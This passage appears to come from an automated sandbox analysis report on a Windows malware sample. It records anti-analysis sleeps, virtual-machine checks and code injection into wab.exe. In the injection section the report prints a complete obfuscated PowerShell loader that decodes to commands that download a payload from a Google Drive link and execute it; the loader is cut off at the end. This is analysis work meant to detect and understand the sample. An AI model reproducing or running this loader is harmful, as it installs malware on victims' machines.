Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2EF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 25BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 25B20000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599436 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599324 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599217 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598873 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598644 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597997 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597670 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597557 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596796 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595550 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595306 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594849 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594496 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594390 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594281 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6547 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3260 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6017 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3840 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5220 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4609 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7532 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 6017 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 3840 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -22136092888451448s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3656 Thread sleep count: 5220 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599654s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3656 Thread sleep count: 4609 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599436s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599324s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599217s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598873s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598644s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598515s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598218s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -598109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597997s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597890s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597670s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597557s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597343s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597234s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597125s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -597015s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596906s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596796s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596687s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596468s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595797s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595672s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595550s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595422s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595306s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595187s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -595078s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594968s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594849s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594719s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594496s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594390s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -594281s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599436 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599324 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599217 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598873 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598644 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597997 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597670 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597557 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597234 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596796 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596687 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596468 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595550 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595306 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594849 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594496 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594390 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594281 Jump to behavior
Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPu9
Source: powershell.exe, 00000003.00000002.2461093933.0000018939B30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9
Source: wscript.exe, 00000001.00000002.1463808181.00000171D0433000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000001.00000002.1463735069.00000171D0391000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000003.1462529160.00000171D0433000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
Source: wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_07B72FBC LdrInitializeThunk,LdrInitializeThunk, 9_2_07B72FBC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EFFCFC Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh 